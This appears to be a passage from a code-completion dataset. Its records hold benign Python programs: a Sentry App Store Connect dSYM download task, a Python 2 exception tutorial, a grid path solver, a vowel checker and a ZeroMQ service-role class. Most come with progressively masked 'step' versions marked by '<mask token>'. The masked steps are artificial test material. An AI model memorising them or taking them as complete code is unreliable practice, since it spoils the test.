logger.debug(\"No dSYMs for build %s\", build)\n # Moves on to the next build so we don't check off fetched. 
This url will\n # eventuallyTM be populated, so revisit it at a later time.\n except appconnect.PendingDsymsError:\n logger.debug(\"dSYM url currently unavailable for build %s\", build)\n continue\n # early-return in unauthorized and forbidden to avoid trying all the other builds\n # as well, since an expired token will error for all of them.\n # the error is also swallowed unreported because this is an expected and actionable\n # error.\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n \"Not authorized to download dSYM using current App Store Connect credentials\",\n level=\"info\",\n )\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n \"Forbidden from downloading dSYM using current App Store Connect credentials\",\n level=\"info\",\n )\n return\n # Don't let malformed URLs abort all pending downloads in case it's an isolated instance\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n # Assume request errors are a server side issue and do not abort all the\n # pending downloads.\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug(\"Uploaded dSYMs for build %s\", build)\n metrics.incr(\"tasks.app_store_connect.builds_ingested\", sample_rate=1)\n\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) -> None:\n with sentry_sdk.start_span(op=\"dsym-difs\", description=\"Extract difs dSYM zip\"):\n with open(dsyms_zip, \"rb\") as fp:\n created = debugfile.create_files_from_dif_zip(fp, project, accept_unknown=True)\n for proj_debug_file in created:\n logger.debug(\"Created %r for project %s\", proj_debug_file, project.id)\n\n\ndef get_or_create_persisted_build(\n project: Project, config: appconnect.AppStoreConnectConfig, build: appconnect.BuildInfo\n) -> AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(\n project=project,\n app_id=build.app_id,\n platform=build.platform,\n bundle_short_version=build.version,\n bundle_version=build.build_number,\n )\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(\n project=project,\n app_id=build.app_id,\n bundle_id=config.bundleId,\n platform=build.platform,\n bundle_short_version=build.version,\n bundle_version=build.build_number,\n uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(),\n fetched=False,\n )\n build_state.save()\n return build_state\n\n\ndef process_builds(\n project: Project,\n config: appconnect.AppStoreConnectConfig,\n to_process: List[appconnect.BuildInfo],\n) -> List[Tuple[appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. 
These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n\n pending_builds = []\n\n with sentry_sdk.start_span(\n op=\"appconnect-update-builds\", description=\"Update AppStoreConnect builds in database\"\n ):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n\n LatestAppConnectBuildsCheck.objects.create_or_update(\n project=project, source_id=config.id, values={\"last_checked\": timezone.now()}\n )\n\n return pending_builds\n\n\n# Untyped decorator would stop type-checking of entire function, split into an inner\n# function instead which can be type checked.\n@instrumented_task( # type: ignore\n name=\"sentry.tasks.app_store_connect.refresh_all_builds\",\n queue=\"appstoreconnect\",\n ignore_result=True,\n)\ndef refresh_all_builds() -> None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() -> None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n # We have no way to query for AppStore Connect symbol sources directly, but\n # getting all of the project options that have custom symbol sources\n # configured is a reasonable compromise, as the number of those should be\n # low enough to traverse every hour.\n # Another alternative would be to get a list of projects that have had a\n # previous successful import, as indicated by existing `AppConnectBuild`\n # objects. But that would miss projects that have a valid AppStore Connect\n # setup, but have not yet published any kind of build to AppStore.\n options = ProjectOption.objects.filter(key=appconnect.SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag(\"project\", option.project_id)\n try:\n if not option.value:\n # An empty string set as option value, the UI does this when deleting\n # all sources. This is not valid JSON.\n continue\n # We are parsing JSON thus all types are Any, so give the type-checker some\n # extra help. We are maybe slightly lying about the type, but the\n # attributes we do access are all string values.\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source[\"id\"]\n source_type = source[\"type\"]\n except KeyError:\n logger.exception(\"Malformed symbol source\")\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(\n kwargs={\n \"project_id\": option.project_id,\n \"config_id\": source_id,\n }\n )\n count += 1\n except Exception:\n logger.exception(\"Failed to refresh AppStoreConnect builds\")\n metrics.gauge(\"tasks.app_store_connect.refreshed\", count, sample_rate=1)\n",
"step-ids": [
3,
5,
7,
9,
10
]
}
|
[
3,
5,
7,
9,
10
] |
from django.apps import AppConfig
class ClassromConfig(AppConfig):
name = 'classrom'
|
normal
|
{
"blob_id": "a995305cb5589fa0cbb246ae3ca6337f4f2c3ca1",
"index": 8798,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ClassromConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ClassromConfig(AppConfig):\n name = 'classrom'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass ClassromConfig(AppConfig):\n name = 'classrom'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#exceptions.py
#-*- coding:utf-8 -*-
#exceptions
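# Python 2 examples of exception handling: try/except/else/finally, multiple
# except clauses, logging exceptions, a custom exception class, re-raising,
# and stepping through code with pdb.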
try:
print u'try。。。'
r = 10/0
print 'result:',r
except ZeroDivisionError,e:
print 'except:',e
finally:
print 'finally...'
print 'END'
try:
print u'try。。。'
r = 10/int('1')
print 'result:',r
except ValueError,e:
print 'ValueError:',e
except ZeroDivisionError,e:
print 'ZeroDivisionError:',e
else:
print 'no error!'
finally:
print 'finally...'
print 'END'
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
try:
bar('0')
except StandardError,e:
print 'Error!'
finally:
print 'finally...'
main()
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
bar('0')
#main()
import logging
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
try:
bar('0')
except StandardError,e:
logging.exception(e)
finally:
print 'finally...'
main()
print 'END'
class FooError(StandardError):
"""docstring for FooError"""
pass
def foo(s):
n = int(s)
if n == 0:
raise FooError('invalid value: %s'%s)
return 10/n
#foo(0)
def foo(s):
n = int(s)
return 10/n
def bar(s):
try:
return foo(s)*2
except StandardError,e:
print 'Log error and raise'
raise
def main():
bar('0')
#main()
import logging
import pdb
logging.basicConfig(level=logging.INFO)
s = '0'
n = int(s)
#pdb.set_trace()
logging.info('n=%d'%n)
#print 10/n
#python -m pdb exceptions.py
#l,n,p,q
|
normal
|
{
"blob_id": "1568cf544a4fe7aec082ef1d7506b8484d19f198",
"index": 3776,
"step-1": "#exceptions.py \n#-*- coding:utf-8 -*-\n\n#exceptions\ntry:\n print u'try。。。'\n r = 10/0\n print 'result:',r\nexcept ZeroDivisionError,e:\n print 'except:',e\nfinally:\n print 'finally...'\nprint 'END'\n\ntry:\n print u'try。。。'\n r = 10/int('1')\n print 'result:',r\nexcept ValueError,e:\n print 'ValueError:',e\nexcept ZeroDivisionError,e:\n print 'ZeroDivisionError:',e\nelse:\n print 'no error!'\nfinally:\n print 'finally...'\nprint 'END'\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n try:\n bar('0')\n except StandardError,e:\n print 'Error!'\n finally:\n print 'finally...'\nmain()\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n bar('0')\n#main()\n\n\nimport logging\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n try:\n bar('0')\n except StandardError,e:\n logging.exception(e)\n finally:\n print 'finally...'\n\nmain()\nprint 'END'\n\nclass FooError(StandardError):\n \"\"\"docstring for FooError\"\"\"\n pass\n\ndef foo(s):\n n = int(s)\n if n == 0:\n raise FooError('invalid value: %s'%s)\n return 10/n\n#foo(0)\n\ndef foo(s):\n n = int(s)\n return 10/n\ndef bar(s):\n try:\n return foo(s)*2\n except StandardError,e:\n print 'Log error and raise'\n raise\ndef main():\n bar('0')\n#main()\n\nimport logging\nimport pdb\nlogging.basicConfig(level=logging.INFO)\ns = '0'\nn = int(s)\n#pdb.set_trace()\nlogging.info('n=%d'%n)\n#print 10/n\n\n#python -m pdb exceptions.py \n#l,n,p,q\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
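# Longest strictly increasing path: for each of n titled grids, compute the length
# of the longest path of orthogonally adjacent cells with strictly increasing
# values and print "<title>: <length>".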
def get_value(li, row, column):
if row < 0 or column < 0:
return 0
try:
return li[row][column]
except IndexError:
return 0
n = int(input())
results = {}
for asdf in range(n):
table = []
title, rows, columns = input().split()
rows = int(rows)
columns = int(columns)
for r in range(rows):
table.append([int(x) for x in input().split()])
flattened = [j for sub in table for j in sub]
sort = sorted(range(len(flattened)), key=lambda k: flattened[k])
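    # Visit cells in ascending order of value, so every strictly smaller neighbour
    # already holds its final path length when a cell is processed.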
distance = [[0 for i in range(columns)] for j in range(rows)]
#print(sort)
maxdist = 0
for i in sort:
r = i//columns
c = i % columns
#print(r)
#print(c)
w = 1
x = 1
y = 1
z = 1
if get_value(table, r, c) == get_value(table, r-1, c):
w = 0
if get_value(table, r, c) == get_value(table, r+1, c):
x = 0
if get_value(table, r, c) == get_value(table, r, c-1):
y = 0
if get_value(table, r, c) == get_value(table, r, c+1):
z = 0
#print(distance)
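        # DP step: path length here = 1 + best neighbour path length, with
        # equal-valued neighbours masked out by the w/x/y/z flags.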
distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),
max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1
if distance[r][c] > maxdist:
maxdist = distance[r][c]
results[title] = maxdist
for key in results:
print(key + ": " + str(results[key]))
|
normal
|
{
"blob_id": "badbfdbdeb8b4fd40b1c44bf7dcff6457a0c8795",
"index": 7162,
"step-1": "<mask token>\n",
"step-2": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\n<mask token>\n",
"step-3": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\n<mask token>\nfor asdf in range(n):\n table = []\n title, rows, columns = input().split()\n rows = int(rows)\n columns = int(columns)\n for r in range(rows):\n table.append([int(x) for x in input().split()])\n flattened = [j for sub in table for j in sub]\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\n distance = [[(0) for i in range(columns)] for j in range(rows)]\n maxdist = 0\n for i in sort:\n r = i // columns\n c = i % columns\n w = 1\n x = 1\n y = 1\n z = 1\n if get_value(table, r, c) == get_value(table, r - 1, c):\n w = 0\n if get_value(table, r, c) == get_value(table, r + 1, c):\n x = 0\n if get_value(table, r, c) == get_value(table, r, c - 1):\n y = 0\n if get_value(table, r, c) == get_value(table, r, c + 1):\n z = 0\n distance[r][c] = max(max(get_value(distance, r - 1, c) * w, \n get_value(distance, r + 1, c) * x), max(get_value(distance, r, \n c - 1) * y, get_value(distance, r, c + 1) * z)) + 1\n if distance[r][c] > maxdist:\n maxdist = distance[r][c]\n results[title] = maxdist\nfor key in results:\n print(key + ': ' + str(results[key]))\n",
"step-4": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\nn = int(input())\nresults = {}\nfor asdf in range(n):\n table = []\n title, rows, columns = input().split()\n rows = int(rows)\n columns = int(columns)\n for r in range(rows):\n table.append([int(x) for x in input().split()])\n flattened = [j for sub in table for j in sub]\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\n distance = [[(0) for i in range(columns)] for j in range(rows)]\n maxdist = 0\n for i in sort:\n r = i // columns\n c = i % columns\n w = 1\n x = 1\n y = 1\n z = 1\n if get_value(table, r, c) == get_value(table, r - 1, c):\n w = 0\n if get_value(table, r, c) == get_value(table, r + 1, c):\n x = 0\n if get_value(table, r, c) == get_value(table, r, c - 1):\n y = 0\n if get_value(table, r, c) == get_value(table, r, c + 1):\n z = 0\n distance[r][c] = max(max(get_value(distance, r - 1, c) * w, \n get_value(distance, r + 1, c) * x), max(get_value(distance, r, \n c - 1) * y, get_value(distance, r, c + 1) * z)) + 1\n if distance[r][c] > maxdist:\n maxdist = distance[r][c]\n results[title] = maxdist\nfor key in results:\n print(key + ': ' + str(results[key]))\n",
"step-5": "def get_value(li, row, column):\r\n if row < 0 or column < 0:\r\n return 0\r\n try:\r\n return li[row][column]\r\n except IndexError:\r\n return 0\r\n\r\n\r\nn = int(input())\r\nresults = {}\r\nfor asdf in range(n):\r\n table = []\r\n title, rows, columns = input().split()\r\n rows = int(rows)\r\n columns = int(columns)\r\n\r\n for r in range(rows):\r\n table.append([int(x) for x in input().split()])\r\n\r\n flattened = [j for sub in table for j in sub]\r\n\r\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\r\n\r\n distance = [[0 for i in range(columns)] for j in range(rows)]\r\n #print(sort)\r\n maxdist = 0\r\n for i in sort:\r\n r = i//columns\r\n c = i % columns\r\n #print(r)\r\n #print(c)\r\n w = 1\r\n x = 1\r\n y = 1\r\n z = 1\r\n if get_value(table, r, c) == get_value(table, r-1, c):\r\n w = 0\r\n if get_value(table, r, c) == get_value(table, r+1, c):\r\n x = 0\r\n if get_value(table, r, c) == get_value(table, r, c-1):\r\n y = 0\r\n if get_value(table, r, c) == get_value(table, r, c+1):\r\n z = 0\r\n #print(distance)\r\n distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),\r\n max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1\r\n if distance[r][c] > maxdist:\r\n maxdist = distance[r][c]\r\n results[title] = maxdist\r\n\r\nfor key in results:\r\n print(key + \": \" + str(results[key])) \r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Identify a vowel
class MainInit(object):
def __init__(self):
self.vowel = str(input("Please type the character: \n"))
if len(self.vowel) > 1:
print("Invalid number of character")
else:
Vowel(self.vowel)
class Vowel(object):
def __init__(self, vowels):
self.vowels = vowels
self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']
for j in range(len(self.list)):
if self.vowels == self.list[j]:
print("The vowel is ", self.list[j])
else:
continue
MainInit()
#
#
# class MainVowel(object):
# def __init__(self):
# string = str(input("Please type the character: \n"))
# if len(string) > 1:
# print("Invalid number of character")
# else:
# VerifyVowel(string)
#
#
# class VerifyVowel(object):
# def __init__(self, string):
# self.string = string
# if len(string) > 1:
# print("Invalid number of character")
# else:
# if string == 'A' or string == 'a':
# print("The vowel is: ", string)
# elif string == 'E' or string == 'e':
# print("The vowel is: ", string)
# elif string == 'I' or string == 'i':
# print("The vowel is: ", string)
# elif string == 'O' or string == 'o':
# print("The vowel is: ", string)
# elif string == 'U' or string == 'u':
# print("The vowel is: ", string)
# else:
# print("No valid")
#
#
# MainVowel()
|
normal
|
{
"blob_id": "8d9f4bce998857bcc7bc2fda0b519f370bf957fe",
"index": 1497,
"step-1": "<mask token>\n\n\nclass Vowel(object):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\n<mask token>\n",
"step-3": "class MainInit(object):\n <mask token>\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\n<mask token>\n",
"step-4": "class MainInit(object):\n\n def __init__(self):\n self.vowel = str(input('Please type the character: \\n'))\n if len(self.vowel) > 1:\n print('Invalid number of character')\n else:\n Vowel(self.vowel)\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\nMainInit()\n",
"step-5": "# Identify a vowel\r\n\r\n\r\nclass MainInit(object):\r\n def __init__(self):\r\n self.vowel = str(input(\"Please type the character: \\n\"))\r\n if len(self.vowel) > 1:\r\n print(\"Invalid number of character\")\r\n else:\r\n Vowel(self.vowel)\r\n\r\n\r\nclass Vowel(object):\r\n def __init__(self, vowels):\r\n self.vowels = vowels\r\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\r\n for j in range(len(self.list)):\r\n if self.vowels == self.list[j]:\r\n print(\"The vowel is \", self.list[j])\r\n else:\r\n continue\r\n\r\n\r\nMainInit()\r\n\r\n\r\n#\r\n#\r\n# class MainVowel(object):\r\n# def __init__(self):\r\n# string = str(input(\"Please type the character: \\n\"))\r\n# if len(string) > 1:\r\n# print(\"Invalid number of character\")\r\n# else:\r\n# VerifyVowel(string)\r\n#\r\n#\r\n# class VerifyVowel(object):\r\n# def __init__(self, string):\r\n# self.string = string\r\n# if len(string) > 1:\r\n# print(\"Invalid number of character\")\r\n# else:\r\n# if string == 'A' or string == 'a':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'E' or string == 'e':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'I' or string == 'i':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'O' or string == 'o':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'U' or string == 'u':\r\n# print(\"The vowel is: \", string)\r\n# else:\r\n# print(\"No valid\")\r\n#\r\n#\r\n# MainVowel()\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
from logging import getLogger
from time import sleep
from uuid import UUID
from zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611
from zhelpers import zpipe
from dcamp.service.configuration import Configuration
from dcamp.types.messages.control import SOS
from dcamp.types.specs import EndpntSpec
from dcamp.util.decorators import runnable
@runnable
class RoleMixin(object):
def __init__(
self,
pipe,
ep,
uuid,
):
self.ctx = Context.instance()
self.__control_pipe = pipe
assert isinstance(ep, EndpntSpec)
self.__endpoint = ep
assert isinstance(uuid, UUID)
self.__uuid = uuid
self.__config_service = None
self.logger = getLogger('dcamp.role.%s' % self)
# { pipe: service, ...}
self.__services = {}
def __str__(self):
return self.__class__.__name__
def __send_control_str(self, message):
self.__control_pipe.send_string(message)
def __recv_control(self):
return self.__control_pipe.recv_string()
def get_config_service(self):
return self.__config_service
def get_config_service_kvdict(self):
assert self.__config_service is not None
return self.__config_service.copy_kvdict()
def _add_service(self, cls, *args, **kwargs):
pipe, peer = zpipe(self.ctx) # create control socket pair
# create service, passing local values along with rest of given args
service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)
self.__services[pipe] = service # add to our dict, using pipe socket as key
if Configuration == cls:
self.__config_service = service
def sos(self):
SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)
def play(self):
# start each service thread
for service in self.__services.values():
service.start()
# @todo: wait for READY message from each service / issue #37
self.run_state()
self.logger.debug('waiting for control commands')
# listen for control commands from caller
while self.in_running_state:
try:
msg = self.__recv_control()
if 'STOP' == msg:
self.__send_control_str('OKAY')
self.logger.debug('received STOP control command')
self.stop_state()
break
else:
self.__send_control_str('WTF')
self.logger.error('unknown control command: %s' % msg)
except ZMQError as e:
if e.errno == ETERM:
self.logger.debug('received ETERM')
self.error_state()
break
else:
raise
except KeyboardInterrupt: # only for roles played by dcamp.App
self.logger.debug('received KeyboardInterrupt')
self.stop_state()
break
# role is exiting; cleanup
return self.__cleanup()
def __cleanup(self):
# stop our services cleanly (if we can)
if not self.in_errored_state:
# @todo: this might raise an exception / issue #38
self.__stop()
# shared context; will be term()'ed by caller
# close all service sockets
for pipe in self.__services:
pipe.close()
del self.__services
# close our own control pipe
self.__control_pipe.close()
del self.__control_pipe
self.logger.debug('role cleanup finished; exiting')
def __stop(self):
""" try to stop all of this Role's services """
# send commands
poller = Poller()
for (pipe, svc) in self.__services.items():
pipe.send_string('STOP')
self.logger.debug('sent STOP command to %s service' % svc)
poller.register(pipe, POLLIN)
# give services a few seconds to cleanup and exit before checking responses
sleep(1)
max_attempts = len(self.__services)
attempts = 0
while self.__some_alive() and attempts < max_attempts:
attempts += 1
# poll for any replies
items = dict(poller.poll(60000)) # wait for messages
# mark responding services as stopped
alive = dict(self.__services) # make copy
for (pipe, svc) in alive.items():
if pipe in items:
reply = pipe.recv_string()
if 'STOPPED' == reply:
self.logger.debug('received STOPPED control reply from %s service' % svc)
svc.join(timeout=5) # STOPPED response should be sent right before svc exit
if svc.is_alive():
self.logger.error('%s service is still alive; not waiting' % svc)
else:
self.logger.debug('%s service thread stopped' % svc)
poller.unregister(pipe)
pipe.close()
del (self.__services[pipe])
else:
self.logger.debug('unknown control reply: %s' % reply)
# log some useful info
if len(self.__services) > 0:
msg = '%s services still alive after %d cycles; ' % (
[str(s) for s in self.__services.values()], attempts)
if attempts < max_attempts:
msg += 'waiting'
else:
msg += 'giving up'
self.logger.debug(msg)
def __some_alive(self):
"""returns True if at least one service of this Role is still running"""
for service in self.__services.values():
if service.is_alive():
return True
return False
|
normal
|
{
"blob_id": "fee757b91f8c2ca1c105d7e67636772a8b5eafd5",
"index": 8158,
"step-1": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n <mask token>\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n <mask token>\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n <mask token>\n",
"step-2": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n <mask token>\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n <mask token>\n",
"step-3": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving 